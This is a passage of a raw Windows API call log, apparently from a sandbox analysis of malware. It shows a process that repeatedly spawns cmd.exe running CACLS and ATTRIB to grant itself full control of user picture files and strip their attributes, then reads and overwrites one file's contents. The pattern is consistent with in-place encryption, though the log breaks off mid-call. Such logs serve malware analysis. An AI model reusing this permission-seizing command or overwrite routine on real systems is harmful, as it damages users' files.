ReleaseMutex (hMutex=0xf8) returned 1 [0191.539] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.539] ReleaseMutex (hMutex=0xf8) returned 1 [0191.539] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.539] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp", lpFilePart=0x12eab4*="usertile42.bmp") returned 0x52 [0191.539] GetLastError () returned 0x5 [0191.539] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0191.539] LocalFree (hMem=0x1c6cc8) returned 0x0 [0191.539] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0191.539] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0191.539] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.539] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.539] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0191.539] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0191.539] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0191.539] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.539] ReleaseMutex (hMutex=0xf8) returned 1 [0191.539] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.539] ReleaseMutex (hMutex=0xf8) returned 1 [0191.539] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.539] ReleaseMutex (hMutex=0xf8) returned 1 [0191.539] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.540] ReleaseMutex (hMutex=0xf8) returned 1 [0191.540] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.540] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp", lpFilePart=0x12eab4*="usertile43.bmp") returned 0x52 [0191.540] GetLastError () returned 0x5 [0191.540] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0191.540] LocalFree (hMem=0x1c6cc8) returned 0x0 [0191.540] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0191.540] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0191.540] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.540] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.540] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0191.540] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0191.540] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x954, dwThreadId=0xb08)) returned 1 [0191.541] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0191.936] CloseHandle (hObject=0x1b4) returned 1 [0191.936] CloseHandle (hObject=0x120) returned 1 [0191.936] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.936] ReleaseMutex (hMutex=0xf8) returned 1 [0191.936] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.936] ReleaseMutex (hMutex=0xf8) returned 1 [0191.936] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.936] ReleaseMutex (hMutex=0xf8) returned 1 [0191.936] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.936] ReleaseMutex (hMutex=0xf8) returned 1 [0191.936] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.936] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp", lpFilePart=0x12eab4*="usertile43.bmp") returned 0x52 [0191.936] GetLastError () returned 0x5 [0191.936] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0191.936] LocalFree (hMem=0x1c6cc8) returned 0x0 [0191.936] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0191.937] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0191.937] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.937] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.937] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0191.937] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0191.937] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0191.937] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.937] ReleaseMutex (hMutex=0xf8) returned 1 [0191.937] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.937] ReleaseMutex (hMutex=0xf8) returned 1 [0191.937] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.937] ReleaseMutex (hMutex=0xf8) returned 1 [0191.937] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.937] ReleaseMutex (hMutex=0xf8) returned 1 [0191.937] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.937] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp", lpFilePart=0x12eab4*="usertile44.bmp") returned 0x52 [0191.937] GetLastError () returned 0x5 [0191.937] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0191.937] LocalFree (hMem=0x1c6cc8) returned 0x0 [0191.937] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0191.937] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0191.938] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.938] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.938] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0191.938] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0191.938] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa90, dwThreadId=0xad8)) returned 1 [0191.939] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0192.414] CloseHandle (hObject=0x1b4) returned 1 [0192.414] CloseHandle (hObject=0x120) returned 1 [0192.414] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.414] ReleaseMutex (hMutex=0xf8) returned 1 [0192.415] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.415] ReleaseMutex (hMutex=0xf8) returned 1 [0192.415] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.415] ReleaseMutex (hMutex=0xf8) returned 1 [0192.415] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.415] ReleaseMutex (hMutex=0xf8) returned 1 [0192.415] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0192.415] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp", lpFilePart=0x12eab4*="usertile44.bmp") returned 0x52 [0192.415] GetLastError () returned 0x5 [0192.415] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0192.415] LocalFree (hMem=0x1c6cc8) returned 0x0 [0192.415] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0192.415] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0192.415] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0192.415] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0192.415] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0192.415] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0192.415] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0192.415] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.415] ReleaseMutex (hMutex=0xf8) returned 1 [0192.415] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.416] ReleaseMutex (hMutex=0xf8) returned 1 [0192.416] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.416] ReleaseMutex (hMutex=0xf8) returned 1 [0192.416] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.416] ReleaseMutex (hMutex=0xf8) returned 1 [0192.416] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.416] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=24920539406) returned 1 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xbb50 [0192.417] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xc038 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xc038 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0192.451] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0192.451] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x601b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x601b, lpOverlapped=0x0) returned 1 [0192.480] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0192.480] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x601b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x601b, lpOverlapped=0x0) returned 1 [0192.480] SetFilePointer (in: hFile=0x120, lDistanceToMove=-24603, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x601d [0192.480] ReadFile (in: hFile=0x120, 